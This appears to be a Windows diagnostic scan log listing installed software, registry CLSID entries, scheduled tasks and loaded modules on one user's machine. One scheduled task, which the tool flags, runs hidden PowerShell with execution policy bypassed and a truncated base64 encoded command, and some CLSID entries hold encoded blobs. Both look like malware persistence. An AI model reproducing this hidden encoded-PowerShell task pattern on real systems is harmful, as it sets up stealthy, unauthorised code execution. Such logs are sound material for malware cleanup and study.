Adobe Bridge CC (64 Bit) (HKLM-x32\...\{359F8007-6486-429C-A8C5-D67F6897C88C}) (Version: 6.2 - Adobe Systems Incorporated)
Adobe Creative Cloud (HKLM-x32\...\Adobe Creative Cloud) (Version: 3.6.0.248 - Adobe Systems Incorporated)
Adobe Illustrator CC 2015 (HKLM-x32\...\ILST_19_2_1) (Version: 19.2.1 - Adobe Systems Incorporated)
Adobe InCopy CC 2015 (HKLM-x32\...\{9EF1DB49-6D32-1014-93B7-EB62FA572532}) (Version: 11.0.1.105 - Adobe Systems Incorporated)
Adobe InDesign CC 2015 (HKLM-x32\...\{DBFD0312-6E55-1014-8952-E78D43BC0147}) (Version: 11.3.0.034 - Adobe Systems Incorporated)
Adobe Photoshop CC 2015 (HKLM-x32\...\{793C2BF7-A4FE-4608-91C9-9282C5801C21}) (Version: 16.1.2 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.06) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.06 - Adobe Systems Incorporated)
Apple Application Support (64-bit) (HKLM\...\{C2651553-6CA3-4822-B2E6-BC4ACA6E0EA2}) (Version: 4.3.1 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{2E4AF2A6-50EA-4260-9BA4-5E582D11879A}) (Version: 9.3.0.15 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{56EC47AA-5813-4FF6-8E75-544026FBEA83}) (Version: 2.2.0.150 - Apple Inc.)
Application Insights Tools for Visual Studio 2015 (HKLM-x32\...\{B87B45A1-B23C-48DC-8857-9B619B420925}) (Version: 4.1.60107.3 - Microsoft Corporation)
ASIO Bridge and Hi-Fi Cable (HKLM-x32\...\VB:ASIOBridge {17359A74-1236-5467}) (Version:  - VB-Audio Software)
Azure AD Authentication Connected Service (x32 Version: 14.0.23107 - Microsoft Corporation) Hidden
AzureTools.Notifications (x32 Version: 2.7.30611.1601 - Microsoft Corporation) Hidden
Blend for Visual Studio SDK for .NET 4.5 (x32 Version: 3.0.40218.0 - Microsoft Corporation) Hidden
Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.)
CallScape (HKLM-x32\...\{27A99694-9A9B-4B75-BE28-B067CBAF10E3}) (Version: 3.0.45 - Intermedia Communications)
CrashPlan (HKLM-x32\...\{6D746BBC-78B6-4364-926D-F686B4228145}) (Version: 4.7.0.317 - Code 42 Software)
Dashlane (HKU\S-1-5-21-2056520425-3879280740-1935492841-1125\...\Dashlane) (Version: 4.5.0.13208 - Dashlane SAS)
DB Browser for SQLite (HKLM-x32\...\SqliteBrowser3) (Version: 3.8.0 - oldsch00l)
Dotfuscator and Analytics Community Edition 5.19.0 (x32 Version: 5.19.0.2930 - PreEmptive Solutions) Hidden
DvmMJCam (HKLM-x32\...\{3C9B0D81-74E8-4321-906C-02B1C5708A2C}) (Version: 1.0.14 - ipcam)
Entity Framework 6.1.3 Tools  for Visual Studio 2015 Update 1 (HKLM-x32\...\{2A56910C-69C8-495D-8ED8-9080F0A14E58}) (Version: 14.0.41103.0 - Microsoft Corporation)
Fax Upload (HKLM-x32\...\Fax Upload) (Version:  - )
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 51.0.2704.103 - Google Inc.)
Google Update Helper (x32 Version: 1.3.30.3 - Google Inc.) Hidden
HP LaserJet 200 color M251 (HKLM-x32\...\{6682B5C4-530A-4FB8-ACAC-80DB5CCC68DD}) (Version: 5.0.12200.1036 - Hewlett-Packard)
HP Update (HKLM-x32\...\{6F1C00D2-25C2-4CBA-8126-AE9A6E2E9CD5}) (Version: 5.003.003.001 - Hewlett-Packard)
hpbDSService (x32 Version: 002.002.07399 - Hewlett-Packard) Hidden
hpbM251DSService (x32 Version: 001.001.05874 - Hewlett-Packard) Hidden
HPDXP (x32 Version: 3.0.26.12 - HP) Hidden
HPLaserJet200color-M251_HelpLearnCenter_SI (HKLM-x32\...\{DDEBEA89-2B5A-4E5B-8702-369882BB3F52}) (Version: 1.01.0000 - Hewlett-Packard)
HPLJDXPHelper (x32 Version: 020.021.004 - HP) Hidden
HPLJUTCore (x32 Version: 004.005.0001 - HP) Hidden
HPLJUTM251 (x32 Version: 3.00.0003 - HP) Hidden
hppLaserJetService (x32 Version: 009.027.00856 - Hewlett-Packard) Hidden
hppM251LaserJetService (x32 Version: 001.019.00639 - Hewlett-Packard) Hidden
hpStatusAlerts (x32 Version: 050.037.00142 - Hewlett Packard) Hidden
hpStatusAlertsM251 (x32 Version: 050.034.00131 - Hewlett-Packard) Hidden
iCloud (HKLM\...\{ADFDB647-35C0-4254-9EE6-2D9C3B7104BD}) (Version: 5.2.1.69 - Apple Inc.)
IIS 10.0 Express (HKLM\...\{7A28A2B0-458B-4A58-84AC-C90D2D4B79FB}) (Version: 10.0.1735 - Microsoft Corporation)
IIS Express Application Compatibility Database for x64 (HKLM\...\{08274920-8908-45c2-9258-8ad67ff77b09}.sdb) (Version:  - )
IIS Express Application Compatibility Database for x86 (HKLM\...\{ad846bae-d44b-4722-abad-f7420e08bcd9}.sdb) (Version:  - )
IPCamClient (HKLM-x32\...\{B1534528-3E4B-4630-A06D-8115917A2B92}) (Version: 1.0.0.10 - )
IPCamTool (HKLM-x32\...\{D1E4A814-3FAE-49B5-8018-F0D789155273}) (Version: 0.0.7.6 - )
iTunes (HKLM\...\{A31C5565-90D9-4615-AE13-94D86C3836C7}) (Version: 12.3.3.17 - Apple Inc.)
JPLAY version 6.2 (HKLM\...\{70443D7F-7971-4AFB-B27F-DC93659AC888}_is1) (Version: 6.2 - www.jplay.eu)
JRiver Media Center 21 (HKLM-x32\...\Media Center 21) (Version: 21 - JRiver, Inc.)
Kyocera Product Library (HKLM\...\Kyocera Product Library) (Version: 4.2.1909 - KYOCERA Document Solutions Inc.)
LJDXPHelperUI (x32 Version: 020.021.004 - HP) Hidden
mbraceToolbar (HKLM-x32\...\mbraceToolbar) (Version: 1.0.1 - Softomate LLC)
Microsoft .NET Framework 4.5 Multi-Targeting Pack (HKLM-x32\...\{56E962F0-4FB0-3C67-88DB-9EAA6EEFC493}) (Version: 4.5.50710 - Microsoft Corporation)
Microsoft .NET Framework 4.5.1 Multi-Targeting Pack (ENU) (HKLM-x32\...\{D3517C62-68A5-37CF-92F7-93C029A89681}) (Version: 4.5.50932 - Microsoft Corporation)
Microsoft .NET Framework 4.5.1 Multi-Targeting Pack (HKLM-x32\...\{6A0C6700-EA93-372C-8871-DCCF13D160A4}) (Version: 4.5.50932 - Microsoft Corporation)
Microsoft .NET Framework 4.5.1 SDK (HKLM-x32\...\{19A5926D-66E1-46FC-854D-163AA10A52D3}) (Version: 4.5.51641 - Microsoft Corporation)
Microsoft .NET Framework 4.5.2 Multi-Targeting Pack (ENU) (HKLM-x32\...\{290FC320-2F5A-329E-8840-C4193BD7A9EE}) (Version: 4.5.51209 - Microsoft Corporation)
Microsoft .NET Framework 4.5.2 Multi-Targeting Pack (HKLM-x32\...\{19E8AE59-4D4A-3534-B567-6CC08FA4102E}) (Version: 4.5.51651 - Microsoft Corporation)
Microsoft .NET Framework 4.6 SDK (HKLM-x32\...\{B5915D37-0637-4A26-A3AA-C5DC9F856370}) (Version: 4.6.00081 - Microsoft Corporation)
Microsoft .NET Framework 4.6 Targeting Pack (ENU) (HKLM-x32\...\{034547E9-D8FA-49E7-8B9C-4C9861FB9146}) (Version: 4.6.00127 - Microsoft Corporation)
Microsoft .NET Framework 4.6 Targeting Pack (HKLM-x32\...\{2CC6A4A7-AAC2-46C9-9DBB-3727B5954F65}) (Version: 4.6.00081 - Microsoft Corporation)
Microsoft .NET Framework 4.6.1 SDK (HKLM-x32\...\{2F0ECC80-B9E4-4485-8083-CD32F22ABD92}) (Version: 4.6.01055 - Microsoft Corporation)
Microsoft .NET Framework 4.6.1 Targeting Pack (ENU) (HKLM-x32\...\{8EEB28EE-5141-411C-9CF0-9952264FE4AF}) (Version: 4.6.01055 - Microsoft Corporation)
Microsoft .NET Framework 4.6.1 Targeting Pack (HKLM-x32\...\{8BC3EEC9-090F-4C53-A8DA-1BEC913040F9}) (Version: 4.6.01055 - Microsoft Corporation)
Microsoft .NET Version Manager (x64) 1.0.0-beta5 (HKLM\...\{c5a4aba3-1aba-3ef8-b2d5-c3fa37f59738}) (Version: 1.0.10609.0 - Microsoft Corporation)
Microsoft ASP.NET MVC 2 (HKLM-x32\...\{DD8FF2F3-0D97-4CF3-AF78-FA0E1B242244}) (Version: 2.0.60926.0 - Microsoft Corporation)
Microsoft Help Viewer 2.2 (HKLM-x32\...\Microsoft Help Viewer 2.2) (Version: 2.2.24720 - Microsoft Corporation)
Microsoft Office 365 ProPlus - en-us (HKLM\...\O365ProPlusRetail - en-us) (Version: 16.0.6965.2058 - Microsoft Corporation)
Microsoft Office 365 Support and Recovery Assistant (HKU\S-1-5-21-2056520425-3879280740-1935492841-1125\...\4415f693b586d348) (Version: 16.0.1116.2 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.50428.0 - Microsoft Corporation)
Microsoft SQL Server 2012 Command Line Utilities  (HKLM\...\{9D573E71-1077-4C7E-B4DB-4E22A5D2B48B}) (Version: 11.0.2100.60 - Microsoft Corporation)
Microsoft SQL Server 2012 Native Client  (HKLM\...\{49D665A2-4C2A-476E-9AB8-FCC425F526FC}) (Version: 11.0.2100.60 - Microsoft Corporation)
Microsoft SQL Server 2014 Management Objects  (HKLM-x32\...\{2774595F-BC2A-4B12-A25B-0C37A37049B0}) (Version: 12.0.2000.8 - Microsoft Corporation)
Microsoft SQL Server 2014 Management Objects  (x64) (HKLM\...\{1F9EB3B6-AED7-4AA7-B8F1-8E314B74B2A5}) (Version: 12.0.2000.8 - Microsoft Corporation)
Microsoft SQL Server 2014 Transact-SQL ScriptDom  (HKLM\...\{020CDFE0-C127-4047-B571-37C82396B662}) (Version: 12.0.2000.8 - Microsoft Corporation)
Microsoft SQL Server 2014 T-SQL Language Service  (HKLM-x32\...\{47D08E7A-92A1-489B-B0BF-415516497BCE}) (Version: 12.0.2000.8 - Microsoft Corporation)
Microsoft SQL Server Compact 4.0 SP1 x64 ENU (HKLM\...\{78909610-D229-459C-A936-25D92283D3FD}) (Version: 4.0.8876.1 - Microsoft Corporation)
Microsoft SQL Server Data Tools - enu (14.0.50616.0) (HKLM-x32\...\{58246C80-3941-4B69-AE31-264644E2ADB8}) (Version: 14.0.50616.0 - Microsoft Corporation)
Microsoft System CLR Types for SQL Server 2014 (HKLM\...\{FC3BB979-AA54-4B60-BBA3-2C4DA6E08D80}) (Version: 12.0.2402.29 - Microsoft Corporation)
Microsoft System CLR Types for SQL Server 2014 (HKLM-x32\...\{091CE6AA-2753-4F6E-AD1C-0E875744EB54}) (Version: 12.0.2402.29 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.23506 (HKLM-x32\...\{3ee5e5bb-b7cc-4556-8861-a00a82977d6c}) (Version: 14.0.23506.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.23506 (HKLM-x32\...\{23daf363-3020-4059-b3ae-dc4ad39fed19}) (Version: 14.0.23506.0 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
Microsoft Visual Studio Community 2015 with Update 1 (HKLM-x32\...\{1d03ad7c-fa27-4517-91b0-410bb49f94d9}) (Version: 14.0.24720.1 - Microsoft Corporation)
Microsoft Web Deploy 3.6 (HKLM\...\{ED4CC1E5-043E-4157-8452-B5E533FE2BA1}) (Version: 3.1238.1955 - Microsoft Corporation)
MSBuild/NuGet Integration 14.0 (x86) (x32 Version: 14.0.24720 - Microsoft Corporation) Hidden
Multi-Device Hybrid Apps using C# - Templates - ENU (x32 Version: 14.0.23107 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Extensibility Component (Version: 16.0.6925.1018 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Licensing Component (Version: 16.0.6925.1018 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Localization Component (Version: 16.0.6925.1018 - Microsoft Corporation) Hidden
PreEmptive Analytics Visual Studio Components (x32 Version: 1.2.5134.1 - PreEmptive Solutions) Hidden
Prerequisites for SSDT  (HKLM-x32\...\{21373064-AD95-48DB-A32E-0D9E08EF7355}) (Version: 12.0.2000.8 - Microsoft Corporation)
Proof Finder 6.2.7 (HKLM\...\{62222DF0-95CE-45E8-BC7F-45E8F0F8539B}) (Version: 6.2.7 - Nuix Pty. Ltd.)
QuickBooks (x32 Version: 25.0.4009.2506 - Intuit Inc.) Hidden
QuickBooks Pro 2015 (HKLM-x32\...\{8F02EFA1-8F5E-4E47-A6B5-D99E4FE90271}) (Version: 25.0.4005.2506 - Intuit Inc.)
QuickBooks Runtime Redistributable (HKLM\...\{F2A4F809-2DE6-4D27-888B-4D2BB8DAF20E}) (Version: 1.00.0000 - Intuit Inc.)
QuickTime 7 (HKLM-x32\...\{3D2CBC2C-65D4-4463-87AB-BB2C859C1F3E}) (Version: 7.76.80.95 - Apple Inc.)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7544 - Realtek Semiconductor Corp.)
Revo Uninstaller Pro 3.1.6 (HKLM\...\{67579783-0FB7-4F7B-B881-E5BE47C9DBE0}_is1) (Version: 3.1.6 - VS Revo Group, Ltd.)
Roslyn Language Services - x86 (x32 Version: 14.0.23107 - Microsoft Corporation) Hidden
Roslyn Language Services - x86 (x32 Version: 14.0.24728 - Microsoft Corporation) Hidden
SONY USB DAC Amplifier (HKLM-x32\...\{24B8A7C8-CB0D-457A-A3BF-6FE253349713}) (Version: 1.0 - Sony Corporation)
Team Explorer for Microsoft Visual Studio 2015 (x32 Version: 14.0.24712 - Microsoft Corporation) Hidden
Test Tools for Microsoft Visual Studio 2015 (x32 Version: 14.0.23107 - Microsoft Corporation) Hidden
TIDAL (HKLM-x32\...\TIDAL 1.3.1.802) (Version: 1.3.1.802 - TIDAL)
TIDAL (x32 Version: 1.3.1.802 - TIDAL) Hidden
Timeline 1.9.0 (HKLM-x32\...\Timeline_is1) (Version:  - Rickard Lindberg <[email protected]>)
TouchCopy 12 (x64) (HKLM\...\{2661548E-C344-407A-882B-438F09C2F5DA}) (Version: 12.82 - Wide Angle Software)
TypeScript Power Tool (x32 Version: 1.7.6.0 - Microsoft Corporation) Hidden
TypeScript Tools for Microsoft Visual Studio 2015 (x32 Version: 1.7.6.0 - Microsoft Corporation) Hidden
TypeScript Tools for Microsoft Visual Studio 2015 1.7.6.0 (HKLM-x32\...\{5ee9a47a-3630-4016-b76d-dc752e9218dd}) (Version: 1.7.24809.0 - Microsoft Corporation)
Update for  (KB2504637) (HKLM-x32\...\{CFEF48A8-BFB8-3EAC-8BA5-DE4F8AA267CE}.KB2504637) (Version: 1 - Microsoft Corporation)
VBCABLE, The Virtual Audio Cable (HKLM\...\VB:VBCABLE {87459874-1236-4469}) (Version:  - VB-Audio Software)
VC12X64Redist (HKLM\...\{B573CC21-AE24-4BC5-9B0B-15CF29A3F982}) (Version: 1.00.0000 - Intuit Inc.)
VC12X86Redist (HKLM-x32\...\{EA9886ED-21F8-4867-A049-CE6817291EE6}) (Version: 1.00.0000 - Intuit Inc.)
Visual Studio 2015 Update 1 (KB3022398) (HKLM-x32\...\{fcaa9dba-9438-48b6-ad91-4e9b4cc7084a}) (Version: 14.0.24720 - Microsoft Corporation)
VLC media player (HKLM-x32\...\VLC media player) (Version: 2.2.2 - VideoLAN)
VS Update core components (x32 Version: 14.0.24720 - Microsoft Corporation) Hidden
Vulkan Run Time Libraries 1.0.3.1 (HKLM\...\VulkanRT1.0.3.1) (Version: 1.0.3.1 - LunarG, Inc.)
WCF Data Services 5.6.4 Runtime (x32 Version: 5.6.62175.4 - Microsoft Corporation) Hidden
WCF Data Services Tools for Microsoft Visual Studio 2015 (x32 Version: 5.6.62175.4 - Microsoft Corporation) Hidden
WordRake for Word (HKLM-x32\...\{958EB5D0-AC7E-4E91-B600-622AF415284F}) (Version: 3.0.11112.01 - WordRake Holdings, LLC)
 
==================== Custom CLSID (Whitelisted): ==========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
CustomCLSID: HKU\S-1-5-21-2056520425-3879280740-1935492841-1125_Classes\CLSID\{0122822e-fedd-d9f3-ceb1-3c49a654c7d31}\InprocServer32 -> 0x9EB0ACCD6882D101A6565684AECCD101480000007301000000000000 => No File
CustomCLSID: HKU\S-1-5-21-2056520425-3879280740-1935492841-1125_Classes\CLSID\{0E270DAA-1BE6-48F2-AC49-E15A1C2ECACB}\InprocServer32 -> %%systemroot%%\system32\shell32.dll => No File
CustomCLSID: HKU\S-1-5-21-2056520425-3879280740-1935492841-1125_Classes\CLSID\{3c3aa0b2-e022-7186-4d7a-f00276332bcf7}\InprocServer32 -> 0x584755335933313657413439464E5343444155504A3951545433444E51514755315555375232434547355846504C4B3554 (the data entry has 225 more characters).
CustomCLSID: HKU\S-1-5-21-2056520425-3879280740-1935492841-1125_Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\localserver32 -> C:\Users\mkt\AppData\Local\Microsoft\OneDrive\17.3.6390.0509\FileCoAuth.exe (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-2056520425-3879280740-1935492841-1125_Classes\CLSID\{BCB2F667-6D6F-456E-90CC-1B7A562D9A2F}\InprocServer32 -> C:\Users\mkt\AppData\Roaming\Intermedia Communications\CallScape\adxloader64.dll ()
CustomCLSID: HKU\S-1-5-21-2056520425-3879280740-1935492841-1125_Classes\CLSID\{e8c77137-e224-5791-b6e9-ff0305797a13}\InprocServer32 -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll (Adobe Systems)
 
==================== Scheduled Tasks (Whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
Task: {0123E0B7-8268-4A2B-8780-BF46B2F1B916} - System32\Tasks\SDMsgUpdate (Local) => C:\SmartDraw 2016\Messages\SDNotify.exe [2016-01-22] ()
Task: {21299417-6820-4AA3-9DF0-E63CBE9D97AE} - System32\Tasks\Microsoft\Windows\Windows Server Essentials\Client Computer Backup on Idle => C:\WINDOWS\System32\Essentials\RunTask.exe [2015-07-10] (Microsoft Corporation)
Task: {31D45ABB-7335-4734-A162-627063112431} - System32\Tasks\Microsoft\Windows\GroupPolicy\{3E0A038B-D834-4930-9981-E89C9BFF83AA}
Task: {3FD95018-49E3-4316-B3DD-0702CE3E6A62} - System32\Tasks\Microsoft\Windows\Windows Server Essentials\Alert Evaluations => C:\WINDOWS\System32\Essentials\RunTask.exe [2015-07-10] (Microsoft Corporation)
Task: {4841CF0B-AEFC-4167-A315-D1455338B598} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2016-04-22] (Adobe Systems Incorporated)
Task: {651A0F61-438D-4A50-8933-9E8BD66D0F69} - System32\Tasks\Microsoft\Office\Office Automatic Updates => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2016-06-10] (Microsoft Corporation)
Task: {6A4FB929-70F5-4308-B063-13AF34A3FA0F} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-12-20] (Google Inc.)
Task: {6A9C397D-71FA-43C4-94F7-AFD4B8B690B4} - System32\Tasks\HPLJCustParticipation => C:\Program Files (x86)\HP\HPLJUT\HPLJUTSCH.exe [2012-06-15] (Hewlett Packard)
Task: {8A449192-DB77-4E7E-9B30-1BE19BD4581B} - System32\Tasks\Microsoft\Windows\Windows Server Essentials\RDP Group Configuration => C:\WINDOWS\System32\Essentials\RunTask.exe [2015-07-10] (Microsoft Corporation)
Task: {93EB5A12-7954-4BE1-A4A6-FB1389328FD7} - System32\Tasks\Microsoft\Windows\GroupPolicy\{A7719E0F-10DB-4640-AD8C-490CC6AD5202}
Task: {98261824-8BE0-4677-BA40-89CD4F3439D8} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2016-06-10] (Microsoft Corporation)
Task: {983FFF48-8571-4D6C-89CB-22A631FB9860} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files\Microsoft Office\root\Office16\msoia.exe [2016-06-10] (Microsoft Corporation)
Task: {9BC0CCF2-4FB3-42DB-A091-1EF11D6CECD1} - System32\Tasks\Microsoft\Windows\Windows Server Essentials\Health Definition Update => C:\WINDOWS\System32\Essentials\RunTask.exe [2015-07-10] (Microsoft Corporation)
Task: {A19944F3-A32B-4A3C-8096-4D17E0ADA553} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2016-02-23] (Apple Inc.)
Task: {A9A45E26-9343-4BCD-99EA-3EF5622FD172} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2016-06-15] (Microsoft Corporation)
Task: {B18353AE-76FA-461B-BBBB-75B04765FBE4} - System32\Tasks\Microsoft\Windows\Windows Server Essentials\Add-in Management => C:\WINDOWS\System32\Essentials\RunTask.exe [2015-07-10] (Microsoft Corporation)
Task: {B74719A4-5976-4800-B3BA-C6A263433A52} - System32\Tasks\SDMsgUpdate (TE) => C:\SmartDraw 2016\Messages\SDNotify.exe [2016-01-22] ()
Task: {BC11B65F-6E85-4F8E-AFDB-5D53FACB3170} - System32\Tasks\AdobeAAMUpdater-1.0-MKTLAW-mkt => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [2016-03-22] (Adobe Systems Incorporated)
Task: {BD1E8764-A09F-4945-A2EA-D471022B4D8B} - System32\Tasks\Microsoft\Windows\Windows Server Essentials\Client Computer Backup => C:\WINDOWS\System32\Essentials\RunTask.exe [2015-07-10] (Microsoft Corporation)
Task: {BF034D78-6DC9-46EB-8B44-83216F37C3C3} - System32\Tasks\Microsoft\Windows\Windows Server Essentials\File History Settings Synchronization => C:\WINDOWS\System32\Essentials\ClientOperator.exe [2015-07-10] (Microsoft Corporation)
Task: {DE0DD811-CBD9-4375-B94E-2390571C4CA8} - System32\Tasks\{7D040447-7E05-0C79-0E11-7E040578117A} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcA (the data entry has 9520 more characters). <==== ATTENTION
Task: {ED5CF342-7B4E-46E0-B98A-8912DF50D99F} - System32\Tasks\Microsoft\Office\Office Subscription Maintenance => C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonx64\Microsoft Shared\Office16\OLicenseHeartbeat.exe [2016-06-10] (Microsoft Corporation)
Task: {F36D45D7-A0E8-42C0-8F89-0365CAC835CA} - System32\Tasks\Microsoft\Windows\Windows Server Essentials\VPN Routes Repair => C:\WINDOWS\System32\Essentials\RunTask.exe [2015-07-10] (Microsoft Corporation)
Task: {F3915F6E-3BDE-4477-8995-D65A7E996046} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files\Microsoft Office\root\Office16\msoia.exe [2016-06-10] (Microsoft Corporation)
Task: {FBD4D82B-B6AC-4E59-AA63-856D71E6783B} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-12-20] (Google Inc.)
 
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
 
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
 
==================== Shortcuts =============================
 
(The entries could be listed to be restored or removed.)
 
==================== Loaded Modules (Whitelisted) ==============
 
2015-10-30 02:17 - 2015-10-30 02:17 - 00028672 _____ () C:\WINDOWS\SYSTEM32\efsext.dll
2015-10-30 02:18 - 2015-10-30 02:18 - 00185856 _____ () C:\WINDOWS\SYSTEM32\ism32k.dll
2016-04-12 18:53 - 2016-03-29 05:20 - 02656952 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
2016-04-18 21:06 - 2016-04-18 21:06 - 00144384 _____ () C:\Program Files\WindowsApps\Microsoft.Messaging_2.15.20002.0_x86__8wekyb3d8bbwe\SkypeHost.exe
2016-04-12 18:53 - 2016-03-29 05:20 - 02656952 _____ () C:\WINDOWS\System32\CoreUIComponents.dll
2016-04-01 23:18 - 2016-04-01 23:18 - 00426160 _____ () C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll
2016-05-25 13:05 - 2016-05-25 13:05 - 00959168 _____ () C:\Users\mkt\AppData\Local\Microsoft\OneDrive\17.3.6390.0509\amd64\ClientTelemetry.dll
2016-03-19 20:41 - 2016-06-10 04:05 - 08919752 _____ () C:\Program Files\Microsoft Office\root\Office16\1033\GrooveIntlResource.dll
2015-12-20 22:44 - 2015-12-20 22:44 - 00093696 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\Windows.UI.Shell.SharedUtilities.dll
2016-05-10 17:59 - 2016-04-22 23:25 - 00472064 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\QuickActions.dll
2016-06-15 01:12 - 2016-05-27 22:59 - 07992832 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2016-06-15 01:11 - 2016-05-27 22:53 - 00591360 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2016-06-15 01:12 - 2016-05-27 22:54 - 02483200 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2016-06-15 01:12 - 2016-05-27 22:56 - 04089856 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2015-12-20 22:21 - 2016-06-03 04:44 - 00227200 _____ () C:\Users\mkt\AppData\Roaming\Dashlane\Dashlane.exe
2015-12-20 22:21 - 2016-06-03 04:44 - 00286080 _____ () C:\Users\mkt\AppData\Roaming\Dashlane\DashlanePlugin.exe
2016-05-04 21:55 - 2016-05-04 21:55 - 00013312 _____ () C:\Program Files (x86)\CrashPlan\md5.dll
